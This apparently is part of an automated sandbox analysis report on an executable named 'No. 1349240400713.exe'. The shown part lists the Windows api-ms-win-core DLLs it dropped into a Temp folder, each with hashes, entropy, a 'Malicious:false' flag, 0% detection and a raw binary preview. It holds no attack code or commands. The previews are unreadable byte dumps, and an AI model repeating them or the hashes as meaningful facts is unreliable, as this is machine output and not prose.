                                                              SHA-256:945CC64EE04B1964C1F9FCDC3124DD83973D332F5CFB696CDF128CA5C4CBD0E5
                                                              SHA-512:AA6F0BCB760D449A3A82AED67CA0F7FB747CBB82E627210F377AF74E0B43A45BA660E9E3FE1AD4CBD2B46B1127108EC4A96C5CF9DE1BDEC36E993D0657A615B6
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....G...........!......................... ...............................0......V.....@............................._............ ..................8=..............T............................................................................text..._........................... ..`.rsrc........ ......................@..@......G........:...T...T.........G........d.................G....................RSDSQ..{...IS].0.> ....api-ms-win-core-handle-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg......._....edata... ..`....rsrc$01....` .......rsrc$02......................G....Z...............(...<...P...................A...|...............,.............api-ms-win-core-handle-l1-1-0.dll.CloseHandle.kernel32.CloseHandle.CompareObjectHandles.kernel32.CompareObjectHandles.DuplicateHandle.kernel32

                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-heap-l1-1-0.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):18232
                                                              Entropy (8bit):7.174986589968396
                                                              Encrypted:false
                                                              SSDEEP:192:GElqWIghWGZi5edXe123Ouo+Uggs/nGfe4pBjS/PHyRWh0txKdmVWQ4GWC2w4Dj3:GElqWPhWCXYi00GftpBjP9emYXlDbNs
                                                              MD5:2EA3901D7B50BF6071EC8732371B821C
                                                              SHA1:E7BE926F0F7D842271F7EDC7A4989544F4477DA7
                                                              SHA-256:44F6DF4280C8ECC9C6E609B1A4BFEE041332D337D84679CFE0D6678CE8F2998A
                                                              SHA-512:6BFFAC8E157A913C5660CD2FABD503C09B47D25F9C220DCE8615255C9524E4896EDF76FE2C2CC8BDEF58D9E736F5514A53C8E33D8325476C5F605C2421F15C7D
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....:............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......:.........8...T...T.........:.........d.................:.....................RSDS.K....OB;....X......api-ms-win-core-heap-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02..........:.........................X...............2...Q...q.......................C...h...........................(...E...f.......................0..._...z...............................................api-ms-win-core-heap-l1-1-0.dll.GetProcessHeap.k

                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-interlocked-l1-1-0.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):17856
                                                              Entropy (8bit):7.076803035880586
                                                              Encrypted:false
                                                              SSDEEP:192:DtiYsFWWIghWGQtu7B123Ouo+Uggs/nGfe4pBjSPiZadcbWh0txKdmVWQ4mWf2FN:5iYsFWWPhWUTi00GftpBjremUBNlgC
                                                              MD5:D97A1CB141C6806F0101A5ED2673A63D
                                                              SHA1:D31A84C1499A9128A8F0EFEA4230FCFA6C9579BE
                                                              SHA-256:DECCD75FC3FC2BB31338B6FE26DEFFBD7914C6CD6A907E76FD4931B7D141718C
                                                              SHA-512:0E3202041DEF9D2278416B7826C61621DCED6DEE8269507CE5783C193771F6B26D47FEB0700BBE937D8AFF9F7489890B5263D63203B5BA99E0B4099A5699C620
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....$.............!......................... ...............................0...........@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....$..........?...T...T........$..........d................$......................RSDS#.......,.S.6.~j....api-ms-win-core-interlocked-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.................$......................(...T...............L...............!...U...................1.......p...............@...s.................................api-ms-win-core-interlocked-l1-1-0.dll.InitializeSListHead.kernel32.InitializeSLis

                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-libraryloader-l1-1-0.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):18744
                                                              Entropy (8bit):7.131154779640255
                                                              Encrypted:false
                                                              SSDEEP:384:yHvuBL3BmWPhWZTi00GftpBjNKnemenyAlvN9W/L:yWBL3BXYoinKne1yd
                                                              MD5:D0873E21721D04E20B6FFB038ACCF2F1
                                                              SHA1:9E39E505D80D67B347B19A349A1532746C1F7F88
                                                              SHA-256:BB25CCF8694D1FCFCE85A7159DCF6985FDB54728D29B021CB3D14242F65909CE
                                                              SHA-512:4B7F2AD9EAD6489E1EA0704CF5F1B1579BAF1061B193D54CC6201FFDDA890A8C8FACB23091DFD851DD70D7922E0C7E95416F623C48EC25137DDD66E32DF9A637
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....u*l...........!......................... ...............................0......9.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....u*l........A...T...T........u*l........d................u*l....................RSDSU..e.j.(.wD.......api-ms-win-core-libraryloader-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............u*l....................(...p...........R...}...............*...Y...................8..._.......................B...k...................F...u...............)...P...w...................................................api-ms-win-c

                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-localization-l1-2-0.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):20792
                                                              Entropy (8bit):7.089032314841867
                                                              Encrypted:false
                                                              SSDEEP:384:KOMw3zdp3bwjGjue9/0jCRrndbVWPhWIDz6i00GftpBj6cemjlD16Pa+4r:KOMwBprwjGjue9/0jCRrndbCOoireqv
                                                              MD5:EFF11130BFE0D9C90C0026BF2FB219AE
                                                              SHA1:CF4C89A6E46090D3D8FEEB9EB697AEA8A26E4088
                                                              SHA-256:03AD57C24FF2CF895B5F533F0ECBD10266FD8634C6B9053CC9CB33B814AD5D97
                                                              SHA-512:8133FB9F6B92F498413DB3140A80D6624A705F80D9C7AE627DFD48ADEB8C5305A61351BF27BBF02B4D3961F9943E26C55C2A66976251BB61EF1537BC8C212ADD
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...S.v............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....S.v.........@...T...T.......S.v.........d...............S.v.....................RSDS..pS...Z4Yr.E@......api-ms-win-core-localization-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................S.v.....v.......;...;...(.......................<...f.......................5...]...................!...I...q...................N.............../...j.............../...^.................../...\...................8...`...........

                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-memory-l1-1-0.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):18744
                                                              Entropy (8bit):7.101895292899441
                                                              Encrypted:false
                                                              SSDEEP:384:+bZWPhWUsnhi00GftpBjwBemQlD16Par7:b4nhoi6BedH
                                                              MD5:D500D9E24F33933956DF0E26F087FD91
                                                              SHA1:6C537678AB6CFD6F3EA0DC0F5ABEFD1C4924F0C0
                                                              SHA-256:BB33A9E906A5863043753C44F6F8165AFE4D5EDB7E55EFA4C7E6E1ED90778ECA
                                                              SHA-512:C89023EB98BF29ADEEBFBCB570427B6DF301DE3D27FF7F4F0A098949F987F7C192E23695888A73F1A2019F1AF06F2135F919F6C606A07C8FA9F07C00C64A34B5
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....%(...........!......................... ...............................0............@.............................l............ ..................8=..............T............................................................................text...l........................... ..`.rsrc........ ......................@..@......%(........:...T...T.........%(........d.................%(....................RSDS.~....%.T.....CO....api-ms-win-core-memory-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......l....edata... ..`....rsrc$01....` .......rsrc$02......................%(....................(...h...........)...P...w...................C...g...................%...P...........B...g...................4...[...|...................=...................................api-ms-win-core-memory-l1-1-0.dl

                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-namedpipe-l1-1-0.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):18232
                                                              Entropy (8bit):7.16337963516533
                                                              Encrypted:false
                                                              SSDEEP:192:pgWIghWGZiBeS123Ouo+Uggs/nGfe4pBjS/fE/hWh0txKdmVWQ4GWoxYyqnaj/6B:iWPhWUEi00GftpBj1temnltcwWB
                                                              MD5:6F6796D1278670CCE6E2D85199623E27
                                                              SHA1:8AA2155C3D3D5AA23F56CD0BC507255FC953CCC3
                                                              SHA-256:C4F60F911068AB6D7F578D449BA7B5B9969F08FC683FD0CE8E2705BBF061F507
                                                              SHA-512:6E7B134CA930BB33D2822677F31ECA1CB6C1DFF55211296324D2EA9EBDC7C01338F07D22A10C5C5E1179F14B1B5A4E3B0BAFB1C8D39FCF1107C57F9EAF063A7B
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L... ..............!......................... ...............................0.......-....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.... ...........=...T...T....... ...........d............... .......................RSDS...IK..XM.&......api-ms-win-core-namedpipe-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................ .......................(...P...x...............:...w...............O...y...............&...W...............=...j.......................api-ms-win-core-namedpipe-l1-1-0.dll.ConnectNamedPipe.kernel32.ConnectNamedPipe.CreateNamedP

                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processenvironment-l1-1-0.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):19248
                                                              Entropy (8bit):7.073730829887072
                                                              Encrypted:false
                                                              SSDEEP:192:wXjWIghWGd4dsNtL/123Ouo+Uggs/nGfe4pBjSXcYddWh0txKdmVWQ4SW04engo5:MjWPhWHsnhi00GftpBjW7emOj5l1z6hP
                                                              MD5:5F73A814936C8E7E4A2DFD68876143C8
                                                              SHA1:D960016C4F553E461AFB5B06B039A15D2E76135E
                                                              SHA-256:96898930FFB338DA45497BE019AE1ADCD63C5851141169D3023E53CE4C7A483E
                                                              SHA-512:77987906A9D248448FA23DB2A634869B47AE3EC81EA383A74634A8C09244C674ECF9AADCDE298E5996CAFBB8522EDE78D08AAA270FD43C66BEDE24115CDBDFED
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...).r............!......................... ...............................0.......:....@.............................G............ ..................0=..............T............................................................................text...G........................... ..`.rsrc........ ......................@..@....).r.........F...T...T.......).r.........d...............).r.....................RSDS.6..~x.......'......api-ms-win-core-processenvironment-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......G....edata... ..`....rsrc$01....` .......rsrc$02........).r.....................(...|.......B...............$...M...{...............P...................6...k.............../...(...e...............=...f...............8...q...............!...T............... ...........................

                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processthreads-l1-1-0.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):19392
                                                              Entropy (8bit):7.082421046253008
                                                              Encrypted:false
                                                              SSDEEP:384:afk1JzNcKSIJWPhW2snhi00GftpBjZqcLvemr4PlgC:RcKST+nhoi/BbeGv
                                                              MD5:A2D7D7711F9C0E3E065B2929FF342666
                                                              SHA1:A17B1F36E73B82EF9BFB831058F187535A550EB8
                                                              SHA-256:9DAB884071B1F7D7A167F9BEC94BA2BEE875E3365603FA29B31DE286C6A97A1D
                                                              SHA-512:D436B2192C4392A041E20506B2DFB593FE5797F1FDC2CDEB2D7958832C4C0A9E00D3AEA6AA1737D8A9773817FEADF47EE826A6B05FD75AB0BDAE984895C2C4EF
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......l.....@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@................B...T...T...................d.......................................RSDS..t........=j.......api-ms-win-core-processthreads-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................1...1...(...........K...x...............,...`...................C...q...............'...N...y..............."...I...{...............B...p...............,...c...............H...x...................9...S...p.......

                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processthreads-l1-1-1.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):18744
                                                              Entropy (8bit):7.1156948849491055
                                                              Encrypted:false
                                                              SSDEEP:384:xzADfIeRWPhWKEi00GftpBjj1emMVlvN0M:xzfeWeoi11ep
                                                              MD5:D0289835D97D103BAD0DD7B9637538A1
                                                              SHA1:8CEEBE1E9ABB0044808122557DE8AAB28AD14575
                                                              SHA-256:91EEB842973495DEB98CEF0377240D2F9C3D370AC4CF513FD215857E9F265A6A
                                                              SHA-512:97C47B2E1BFD45B905F51A282683434ED784BFB334B908BF5A47285F90201A23817FF91E21EA0B9CA5F6EE6B69ACAC252EEC55D895F942A94EDD88C4BFD2DAFD
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....9.............!......................... ...............................0......k.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....9..........B...T...T........9..........d................9......................RSDS&.n....5..l....)....api-ms-win-core-processthreads-l1-1-1.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............9......................(...`...........-...l..........."...W...................N...................P...............F...q...............3...r...................................api-ms-win-core-processthreads-l1-1-1.dll.FlushInstr

                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-profile-l1-1-0.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):17712
                                                              Entropy (8bit):7.187691342157284
                                                              Encrypted:false
                                                              SSDEEP:192:w9WIghWGdUuDz7M123Ouo+Uggs/nGfe4pBjSXrw58h6Wh0txKdmVWQ4SW7QQtzko:w9WPhWYDz6i00GftpBjXPemD5l1z6hv
                                                              MD5:FEE0926AA1BF00F2BEC9DA5DB7B2DE56
                                                              SHA1:F5A4EB3D8AC8FB68AF716857629A43CD6BE63473
                                                              SHA-256:8EB5270FA99069709C846DB38BE743A1A80A42AA1A88776131F79E1D07CC411C
                                                              SHA-512:0958759A1C4A4126F80AA5CDD9DF0E18504198AEC6828C8CE8EB5F615AD33BF7EF0231B509ED6FD1304EEAB32878C5A649881901ABD26D05FD686F5EBEF2D1C3
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....&............!......................... ...............................0......0.....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....&.........;...T...T........&.........d................&.....................RSDS...O.""#.n....D:....api-ms-win-core-profile-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................&.....<...............(...0...8...w......._...........api-ms-win-core-profile-l1-1-0.dll.QueryPerformanceCounter.kernel32.QueryPerformanceCounter.QueryPerformanceFrequency.kernel32.QueryPerformanceFrequency....................

                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-rtlsupport-l1-1-0.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):17720
                                                              Entropy (8bit):7.19694878324007
                                                              Encrypted:false
                                                              SSDEEP:384:61G1WPhWksnhi00GftpBjEVXremWRlP55Jk:kGiYnhoiqVXreDT5Y
                                                              MD5:FDBA0DB0A1652D86CD471EAA509E56EA
                                                              SHA1:3197CB45787D47BAC80223E3E98851E48A122EFA
                                                              SHA-256:2257FEA1E71F7058439B3727ED68EF048BD91DCACD64762EB5C64A9D49DF0B57
                                                              SHA-512:E5056D2BD34DC74FC5F35EA7AA8189AAA86569904B0013A7830314AE0E2763E95483FABDCBA93F6418FB447A4A74AB0F07712ED23F2E1B840E47A099B1E68E18
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......(...........!......................... ...............................0......}"....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.......(........>...T...T..........(........d..................(....................RSDS?.L.N.o.....=.......api-ms-win-core-rtlsupport-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................(....F...............(...4...@...~...........l.................api-ms-win-core-rtlsupport-l1-1-0.dll.RtlCaptureContext.ntdll.RtlCaptureContext.RtlCaptureStackBackTrace.ntdll.RtlCaptureStackBackTrace.RtlUnwind.ntdll.RtlUnwind.

                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-string-l1-1-0.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):18232
                                                              Entropy (8bit):7.137724132900032
                                                              Encrypted:false
                                                              SSDEEP:384:xyMvRWPhWFs0i00GftpBjwCJdemnflUG+zI4:xyMvWWoibeTnn
                                                              MD5:12CC7D8017023EF04EBDD28EF9558305
                                                              SHA1:F859A66009D1CAAE88BF36B569B63E1FBDAE9493
                                                              SHA-256:7670FDEDE524A485C13B11A7C878015E9B0D441B7D8EB15CA675AD6B9C9A7311
                                                              SHA-512:F62303D98EA7D0DDBE78E4AB4DB31AC283C3A6F56DBE5E3640CBCF8C06353A37776BF914CFE57BBB77FC94CCFA48FAC06E74E27A4333FBDD112554C646838929
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....R............!......................... ...............................0.......\....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......R.........:...T...T.........R.........d.................R.....................RSDS..D..a..1.f....7....api-ms-win-core-string-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02......................R.....x...............(...H...h...............)...O...x...........................>...i...........................api-ms-win-core-string-l1-1-0.dll.CompareStringEx.kernel32.CompareStringEx.CompareStringOrdinal.kernel32.Compare

                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-1-0.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):20280
                                                              Entropy (8bit):7.04640581473745
                                                              Encrypted:false
                                                              SSDEEP:384:5Xdv3V0dfpkXc0vVaHWPhWXEi00GftpBj9em+4lndanJ7o:5Xdv3VqpkXc0vVa8poivex
                                                              MD5:71AF7ED2A72267AAAD8564524903CFF6
                                                              SHA1:8A8437123DE5A22AB843ADC24A01AC06F48DB0D3
                                                              SHA-256:5DD4CCD63E6ED07CA3987AB5634CA4207D69C47C2544DFEFC41935617652820F
                                                              SHA-512:7EC2E0FEBC89263925C0352A2DE8CC13DA37172555C3AF9869F9DBB3D627DD1382D2ED3FDAD90594B3E3B0733F2D3CFDEC45BC713A4B7E85A09C164C3DFA3875
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......2...........!......................... ...............................0............@.............................V............ ..................8=..............T............................................................................text...V........................... ..`.rsrc........ ......................@..@.......2........9...T...T..........2........d..................2....................RSDS...z..C...+Q_.....api-ms-win-core-synch-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg.......V....edata... ..`....rsrc$01....` .......rsrc$02.......................2............)...)...(.......p.......1...c...................!...F...m...............$...X...........$...[.......................@...i...............!...Q.......................[...............7...........O...................

                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-2-0.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):18744
                                                              Entropy (8bit):7.138910839042951
                                                              Encrypted:false
                                                              SSDEEP:384:JtZ3gWPhWFA0i00GftpBj4Z8wemFfYlP55t:j+oiVweb53
                                                              MD5:0D1AA99ED8069BA73CFD74B0FDDC7B3A
                                                              SHA1:BA1F5384072DF8AF5743F81FD02C98773B5ED147
                                                              SHA-256:30D99CE1D732F6C9CF82671E1D9088AA94E720382066B79175E2D16778A3DAD1
                                                              SHA-512:6B1A87B1C223B757E5A39486BE60F7DD2956BB505A235DF406BCF693C7DD440E1F6D65FFEF7FDE491371C682F4A8BB3FD4CE8D8E09A6992BB131ADDF11EF2BF9
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...X*uY...........!......................... ...............................0......3.....@.............................v............ ..................8=..............T............................................................................text...v........................... ..`.rsrc........ ......................@..@....X*uY........9...T...T.......X*uY........d...............X*uY....................RSDS.V..B...`..S3.....api-ms-win-core-synch-l1-2-0.pdb............T....rdata..T........rdata$zzzdbg.......v....edata... ..`....rsrc$01....` .......rsrc$02....................X*uY....................(...l...........R...................W...............&...b...............$...W.......6...w...............;...|...............H...................A.....................................api-ms-win-core-synch-

                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-sysinfo-l1-1-0.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):19248
                                                              Entropy (8bit):7.072555805949365
                                                              Encrypted:false
                                                              SSDEEP:384:2q25WPhWWsnhi00GftpBj1u6qXxem4l1z6hi:25+SnhoiG6IeA8
                                                              MD5:19A40AF040BD7ADD901AA967600259D9
                                                              SHA1:05B6322979B0B67526AE5CD6E820596CBE7393E4
                                                              SHA-256:4B704B36E1672AE02E697EFD1BF46F11B42D776550BA34A90CD189F6C5C61F92
                                                              SHA-512:5CC4D55350A808620A7E8A993A90E7D05B441DA24127A00B15F96AAE902E4538CA4FED5628D7072358E14681543FD750AD49877B75E790D201AB9BAFF6898C8D
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....C=...........!......................... ...............................0............@.............................E............ ..................0=..............T............................................................................text...E........................... ..`.rsrc........ ......................@..@......C=........;...T...T.........C=........d.................C=....................RSDS....T.>eD.#|.../....api-ms-win-core-sysinfo-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......E....edata... ..`....rsrc$01....` .......rsrc$02......................C=....................(...........:...i...............N...................7...s...............+...M...r.............../...'...V...............:...k...................X............... ...?...d..............."...................

                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-timezone-l1-1-0.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):18224
                                                              Entropy (8bit):7.17450177544266
                                                              Encrypted:false
                                                              SSDEEP:384:SWPhWK3di00GftpBjH35Gvem2Al1z6hIu:77NoiOve7eu
                                                              MD5:BABF80608FD68A09656871EC8597296C
                                                              SHA1:33952578924B0376CA4AE6A10B8D4ED749D10688
                                                              SHA-256:24C9AA0B70E557A49DAC159C825A013A71A190DF5E7A837BFA047A06BBA59ECA
                                                              SHA-512:3FFFFD90800DE708D62978CA7B50FE9CE1E47839CDA11ED9E7723ACEC7AB5829FA901595868E4AB029CDFB12137CF8ECD7B685953330D0900F741C894B88257B
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....Y.x...........!......................... ...............................0......}3....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....Y.x........<...T...T........Y.x........d................Y.x....................RSDS.^.b. .t.H.a.......api-ms-win-core-timezone-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................Y.x....................(...L...p...........5...s...........+...i...................U...............I.........................api-ms-win-core-timezone-l1-1-0.dll.FileTimeToSystemTime.kernel32.FileTimeToSystemTime.GetDynamicTimeZ

                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-util-l1-1-0.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):18232
                                                              Entropy (8bit):7.1007227686954275
                                                              Encrypted:false
                                                              SSDEEP:192:pePWIghWG4U9wluZo123Ouo+Uggs/nGfe4pBjSbKT8wuxWh0txKdmVWQ4CWnFnwQ:pYWPhWFS0i00GftpBj7DudemJlP552
                                                              MD5:0F079489ABD2B16751CEB7447512A70D
                                                              SHA1:679DD712ED1C46FBD9BC8615598DA585D94D5D87
                                                              SHA-256:F7D450A0F59151BCEFB98D20FCAE35F76029DF57138002DB5651D1B6A33ADC86
                                                              SHA-512:92D64299EBDE83A4D7BE36F07F65DD868DA2765EB3B39F5128321AFF66ABD66171C7542E06272CB958901D403CCF69ED716259E0556EE983D2973FAA03C55D3E
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....f............!......................... ...............................0......`k....@.............................9............ ..................8=..............T............................................................................text...)........................... ..`.rsrc........ ......................@..@......f.........8...T...T.........f.........d.................f.....................RSDS*...$.L.Rm..l.....api-ms-win-core-util-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg.......9....edata... ..`....rsrc$01....` .......rsrc$02..........f.....J...................,...@...o...................j...}.........................api-ms-win-core-util-l1-1-0.dll.Beep.kernel32.Beep.DecodePointer.kernel32.DecodePointer.DecodeSystemPointer.kernel32.DecodeSystemPointer.EncodePointer.kernel3

